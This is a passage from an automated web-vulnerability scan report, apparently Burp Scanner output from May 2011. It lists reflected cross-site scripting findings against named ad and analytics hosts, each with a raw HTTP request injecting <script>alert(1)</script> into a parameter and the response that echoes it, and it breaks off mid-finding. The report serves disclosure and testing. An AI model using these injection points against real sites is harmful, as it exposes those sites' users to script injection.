User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=B313D3CD-2147-4ACC-A03C-CCA65D06F94D; PRbu=EoSNMBpPq; PRsl=11042210442417319321424330526S; PRvt=CGJBaEoSNMBpPqAI5BBeJUpEoeWZPXI2ARGCAeJo2Eotmg43mJ!EQCAeJozEon0qBOtv!FLBCeJpJEothAYwPFAxsCAeJjUEotmZjrmKAEcCDe; PRgo=BCBAAsJvCAAuILDBF-19!BCVBF4FRDVCFUE6; PRimp=D9A20400-E3A0-8979-1309-A36001100200; PRca=|AKLC*1774:2|AKTy*9203:1|AKRD*2017:1|AKQh*130:2|AKQf*282:294|AKTa*130:1|AKVY*127:1|AKQk*1753:12|AKPE*832:2|AKN6*527:2|AJvt*77:1|AKDp*36:2|AKOh*27:1|AKRt*47:2|AKOA*1753:1|AJsL*1753:1|AKGw*2017:1|AJvr*1753:1|AKLp*1753:2|AJcC*23172:1|#; PRcp=|AKLCAA2c:2|AKTyACY1:1|AKRDAA67:1|AKQhAACG:2|AKQfAAE8:294|AKTaAACG:1|AKQkAFiH:3|AKVYAACD:1|AKQkAFx5:2|AKQkAA2R:7|AKPEAAN0:2|AKN6AAI5:2|AJvtAABP:1|AKDpAAAa:2|AKOhAAA1:1|AKRtAAAl:2|AKOAAA2R:1|AJsLAA2R:1|AKGwAA67:1|AJvrAA2R:1|AKLpAA2R:2|AJcCAGBk:1|#; PRpl=|FW9q:1|FW9n:1|FKqE:2|FWcL:1|FZsH:1|FYnl:1|FYnm:1|FVn1:58|FVnS:59|FVnT:59|FVnV:59|FVnU:59|FWau:1|FW9s:1|FW9l:1|FY3g:1|FW9r:1|FW9T:3|FW9U:4|FOLx:1|FOLw:1|FPoF:2|Eviz:1|FLXe:1|FLW9:1|FODi:1|FUZr:2|FOn5:1|Etxz:1|FO2m:1|FCbK:1|FPLN:2|Eoxl:1|#; PRcr=|GKwo:2|GLLp:1|GMjB:1|GMEZ:1|GMEa:1|GLEi:58|GLEl:59|GLEo:59|GLEp:59|GLEm:59|GKw2:1|GMGQ:1|GLZC:3|GLZE:4|GLZD:3|GLZB:2|GJTv:1|GJTs:1|GKTE:1|GKTL:1|FzvF:1|GHhF:2|GJQB:1|GKwB:1|GKvy:1|GJsu:1|GA7A:1|GKDl:1|GJij:1|GDVY:1|GKCp:1|Fy9A:1|#; PRpc=|FW9qGLZC:1|FW9nGLZC:1|FKqEGKwo:2|FWcLGLLp:1|FZsHGMjB:1|FYnlGMEZ:1|FYnmGMEa:1|FVn1GLEi:58|FVnSGLEl:59|FVnTGLEo:59|FVnVGLEp:59|FVnUGLEm:59|FWauGKw2:1|FW9sGLZE:1|FW9lGLZE:1|FY3gGMGQ:1|FW9rGLZC:1|FW9UGLZE:2|FW9TGLZD:3|FW9UGLZB:2|FOLxGJTv:1|FOLwGJTs:1|FPoFGKTE:1|FPoFGKTL:1|EvizFzvF:1|FLXeGHhF:1|FLW9GHhF:1|FODiGJQB:1|FUZrGKwB:1|FUZrGKvy:1|FOn5GJsu:1|EtxzGA7A:1|FPLNGKDl:1|FO2mGJij:1|FCbKGDVY:1|FPLNGKCp:1|EoxlFy9A:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 09 May 2011 15:39:54 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache

document.write("<iframe id='profr1278576' src='http://ads.pointroll.com/PortalServe/?pid=1278576G80420110421221132&cid=1472985&pos=h&redir=http://ad.doubleclick.net/click%3Bh=v8/3b02/3/0/*/j%3B240265126%3B0-0%3B0%3B60978287%3B4307-300/250%3B41844694/41862481/1%3B%3B~sscs=%3F$CTURL$&time=1|10:39|-58667f";alert(1)//4dd79ad4bda&r=0.699075760319829&server=polRedir' width='300' height='250' frameborder='0' marginwidth='0' marginheight='0' scrolling='NO'>
...[SNIP]...

2.38. http://api-public.addthis.com/url/shares.json [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api-public.addthis.com
Path:   /url/shares.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload fcecc<script>alert(1)</script>6208431cf82 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /url/shares.json?url=http%3A%2F%2Fwww.csmonitor.com%2FBusiness%2F2011%2F0509%2FGas-prices-start-to-head-down&callback=_ate.cbs.sc_httpwwwcsmonitorcomBusiness20110509Gaspricesstarttoheaddownfcecc<script>alert(1)</script>6208431cf82 HTTP/1.1
Host: api-public.addthis.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business/2011/0509/Gas-prices-start-to-head-down
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uit=1; dt=X; di=%7B%7D..1304951889.1FE|1304955482.1OD|1304951889.60; uid=4dab4fa85facd099; psc=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=300
Content-Type: application/javascript;charset=UTF-8
Date: Mon, 09 May 2011 15:39:18 GMT
Content-Length: 127
Connection: close

_ate.cbs.sc_httpwwwcsmonitorcomBusiness20110509Gaspricesstarttoheaddownfcecc<script>alert(1)</script>6208431cf82({"shares":1});

2.39. http://ar.voicefive.com/b/rc.pli [func parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/rc.pli

Issue detail

The value of the func request parameter is copied into the HTML document as plain text between tags. The payload 581d3<script>alert(1)</script>f2d9ac3c949 was submitted in the func parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b/rc.pli?func=COMSCORE.BMX.Broker.handleInteraction581d3<script>alert(1)</script>f2d9ac3c949&n=ar_int_p97174789&1304955333231 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p97174789=exp=41&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:35:22 2011&prad=253732017&arc=194941149&; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1304955323%2E101%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 15:35:34 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 83

COMSCORE.BMX.Broker.handleInteraction581d3<script>alert(1)</script>f2d9ac3c949("");

2.40. http://b.scorecardresearch.com/beacon.js [c1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload b98a4<script>alert(1)</script>65268a8432b was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7b98a4<script>alert(1)</script>65268a8432b&c2=5964888&c3=2&c4=&c5=&c6=&c15=&tm=873164 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 16 May 2011 15:35:01 GMT
Date: Mon, 09 May 2011 15:35:01 GMT
Connection: close
Content-Length: 1235

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
E.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7b98a4<script>alert(1)</script>65268a8432b", c2:"5964888", c3:"2", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

2.41. http://b.scorecardresearch.com/beacon.js [c15 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload 875cb<script>alert(1)</script>e60512b0d49 was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2&c4=&c5=&c6=&c15=875cb<script>alert(1)</script>e60512b0d49&tm=873164 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 16 May 2011 15:35:03 GMT
Date: Mon, 09 May 2011 15:35:03 GMT
Connection: close
Content-Length: 1235

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"", c5:"", c6:"", c10:"", c15:"875cb<script>alert(1)</script>e60512b0d49", c16:"", r:""});

2.42. http://b.scorecardresearch.com/beacon.js [c2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload 1f594<script>alert(1)</script>f2857c8a3bb was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=59648881f594<script>alert(1)</script>f2857c8a3bb&c3=2&c4=&c5=&c6=&c15=&tm=873164 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 16 May 2011 15:35:01 GMT
Date: Mon, 09 May 2011 15:35:01 GMT
Connection: close
Content-Length: 1235

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
on(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"59648881f594<script>alert(1)</script>f2857c8a3bb", c3:"2", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

2.43. http://b.scorecardresearch.com/beacon.js [c3 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload 6a371<script>alert(1)</script>d37c0203cc4 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=26a371<script>alert(1)</script>d37c0203cc4&c4=&c5=&c6=&c15=&tm=873164 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 16 May 2011 15:35:02 GMT
Date: Mon, 09 May 2011 15:35:02 GMT
Connection: close
Content-Length: 1235

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
y{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"5964888", c3:"26a371<script>alert(1)</script>d37c0203cc4", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

2.44. http://b.scorecardresearch.com/beacon.js [c4 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 98da8<script>alert(1)</script>ccf069095d5 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2&c4=98da8<script>alert(1)</script>ccf069095d5&c5=&c6=&c15=&tm=873164 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 16 May 2011 15:35:02 GMT
Date: Mon, 09 May 2011 15:35:02 GMT
Connection: close
Content-Length: 1235

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"98da8<script>alert(1)</script>ccf069095d5", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

2.45. http://b.scorecardresearch.com/beacon.js [c5 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 5f82e<script>alert(1)</script>3aa7d9dfcd8 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2&c4=&c5=5f82e<script>alert(1)</script>3aa7d9dfcd8&c6=&c15=&tm=873164 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 16 May 2011 15:35:03 GMT
Date: Mon, 09 May 2011 15:35:03 GMT
Connection: close
Content-Length: 1235

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"", c5:"5f82e<script>alert(1)</script>3aa7d9dfcd8", c6:"", c10:"", c15:"", c16:"", r:""});



2.46. http://b.scorecardresearch.com/beacon.js [c6 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 631f9<script>alert(1)</script>452333e2e19 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2&c4=&c5=&c6=631f9<script>alert(1)</script>452333e2e19&c15=&tm=873164 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 16 May 2011 15:35:03 GMT
Date: Mon, 09 May 2011 15:35:03 GMT
Connection: close
Content-Length: 1235

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"", c5:"", c6:"631f9<script>alert(1)</script>452333e2e19", c10:"", c15:"", c16:"", r:""});



2.47. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-Legacy/All/14a155dda-808a-4648-a03d-f65de2ef0ada@x90 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ZapTrader/ATT/Wired/Pros-Legacy/All/14a155dda-808a-4648-a03d-f65de2ef0ada@x90

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20f90"><script>alert(1)</script>1920f1c3f9d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ZapTrader20f90"><script>alert(1)</script>1920f1c3f9d/ATT/Wired/Pros-Legacy/All/14a155dda-808a-4648-a03d-f65de2ef0ada@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; Dominos=247B3; RMFL=011QD4ETU107OI|U107OK; PizzaHut=ZapTrader; RMFM=011QGuZMJ10CWN|U10CXL; NXCLICK2=011QGuZMNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_TE_ALL/1x1/11304348270.6228!y!B3!CXL!EVT; id=914804995789526

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:32 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 393
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5545525d5f4f58455e445a4a423660;path=/;httponly

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ZapTrader20f90"><script>alert(1)</script>1920f1c3f9d/ATT/Wired/Pros-Legacy/All/14a155dda-808a-4648-a03d-f65de2ef0ada/1779262043/x90/default/empty.gif/726348573830327254356f4142562f46?x" target="_top">
...[SNIP]...

2.48. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-Legacy/All/14a155dda-808a-4648-a03d-f65de2ef0ada@x90 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ZapTrader/ATT/Wired/Pros-Legacy/All/14a155dda-808a-4648-a03d-f65de2ef0ada@x90

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25f2a"><script>alert(1)</script>656d0189602 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ZapTrader/ATT25f2a"><script>alert(1)</script>656d0189602/Wired/Pros-Legacy/All/14a155dda-808a-4648-a03d-f65de2ef0ada@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; Dominos=247B3; RMFL=011QD4ETU107OI|U107OK; PizzaHut=ZapTrader; RMFM=011QGuZMJ10CWN|U10CXL; NXCLICK2=011QGuZMNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_TE_ALL/1x1/11304348270.6228!y!B3!CXL!EVT; id=914804995789526

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:34 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 392
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5145525d5f4f58455e445a4a423660;path=/;httponly

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ZapTrader/ATT25f2a"><script>alert(1)</script>656d0189602/Wired/Pros-Legacy/All/14a155dda-808a-4648-a03d-f65de2ef0ada/464140654/x90/default/empty.gif/726348573830327254356f4142562f46?x" target="_top">
...[SNIP]...

2.49. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-Legacy/All/14a155dda-808a-4648-a03d-f65de2ef0ada@x90 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ZapTrader/ATT/Wired/Pros-Legacy/All/14a155dda-808a-4648-a03d-f65de2ef0ada@x90

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19e49"><script>alert(1)</script>80037391578 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ZapTrader/ATT/Wired19e49"><script>alert(1)</script>80037391578/Pros-Legacy/All/14a155dda-808a-4648-a03d-f65de2ef0ada@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; Dominos=247B3; RMFL=011QD4ETU107OI|U107OK; PizzaHut=ZapTrader; RMFM=011QGuZMJ10CWN|U10CXL; NXCLICK2=011QGuZMNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_TE_ALL/1x1/11304348270.6228!y!B3!CXL!EVT; id=914804995789526

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:36 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 393
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5545525d5f4f58455e445a4a423660;path=/;httponly

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ZapTrader/ATT/Wired19e49"><script>alert(1)</script>80037391578/Pros-Legacy/All/14a155dda-808a-4648-a03d-f65de2ef0ada/1948118371/x90/default/empty.gif/726348573830327254356f4142562f46?x" target="_top">
...[SNIP]...

2.50. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-Legacy/All/14a155dda-808a-4648-a03d-f65de2ef0ada@x90 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ZapTrader/ATT/Wired/Pros-Legacy/All/14a155dda-808a-4648-a03d-f65de2ef0ada@x90

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aee35"><script>alert(1)</script>dbb7e18ef46 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

